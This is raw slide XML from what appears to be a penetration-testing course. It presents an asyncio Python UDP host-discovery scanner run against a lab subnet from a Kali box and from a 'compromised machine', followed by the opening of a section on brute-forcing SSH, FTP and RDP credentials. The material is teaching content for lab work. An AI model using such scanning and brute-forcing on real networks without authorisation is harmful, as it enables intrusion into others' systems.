                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</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.tries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</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.current_iteration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>True</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.transport.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>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def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>error_received</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exc</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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exc.errno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>111</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.tries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</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.current_iteration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            </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.transport.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</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.tries</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a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> is alive!"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>connection_lost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="13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374180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Asynchronous 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we will define our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> method, which will run the host discovery process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86</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648913" y="2530288"/>
            <a:ext cx="10126026" cy="375487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run</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tries = [</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message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ilikekombucha</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loop = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asyncio.get_running_loop</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on_con_lost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loop.create_future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transport, protocol =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loop.create_datagram_endpoint</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lambda</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HostDiscoverer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(message, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_con_lost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, host, tries, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</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remote_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=(host, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>random.randrange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10000</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65535</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asyncio.wait_for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on_con_lost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asyncio.exceptions.TimeoutError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pass</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finally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transport.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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556464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Asynchronous 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Finally, we will define and run our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> function which will run all the host discovery coroutines for us</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87</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693028" y="2737801"/>
            <a:ext cx="10126026" cy="116955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main</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coros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = [run(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(host)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>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host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>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ipaddress.IPv4Network(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sys.argv</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]).hosts()]</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asyncio.gather</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coros</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err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asyncio.run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(main())</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2738235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Asynchronous UDP Host Discovery (cont.)</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this from our Kali machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52BC1BD0-9BCB-4094-B36A-7A4D85B6FD97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8E89103-9D14-4813-B00F-0D246F488313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1636880" y="2430025"/>
            <a:ext cx="10126026" cy="523220"/>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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>python udp_host_discovery_asyncio.py 172.16.238.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.16.238.100 is alive!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0334114C-69F4-4D1F-BE55-D59AE83CB18D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147962" y="3224581"/>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this from the compromised machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E316ED01-2BBB-4ACD-B400-7BA7B590AEA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1636880" y="3760187"/>
            <a:ext cx="10126026" cy="1600438"/>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root@pcpapp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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>python3.10 udp_host_discovery_asyncio.py 172.16.238.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.16.238.1 is alive!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.16.238.11 is alive!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.16.238.12 is alive!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.16.238.51 is alive!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.16.238.100 is alive!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@pcpapp</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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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2D314D20-5FFB-4B78-869B-EB934D639A35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2335078" y="5967512"/>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notice that this runs faster than our previous synchronous script.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5866279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Brute Forcing Network Services</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might want to write a tool to brute force credentials against any targeted service such as SSH, FTP, or RDP. Once we understand the authentication mechanism, we can start writing code to brute force the targeted service.</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Most of the time, the protocols we need to brute force against are already implemented in Python.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
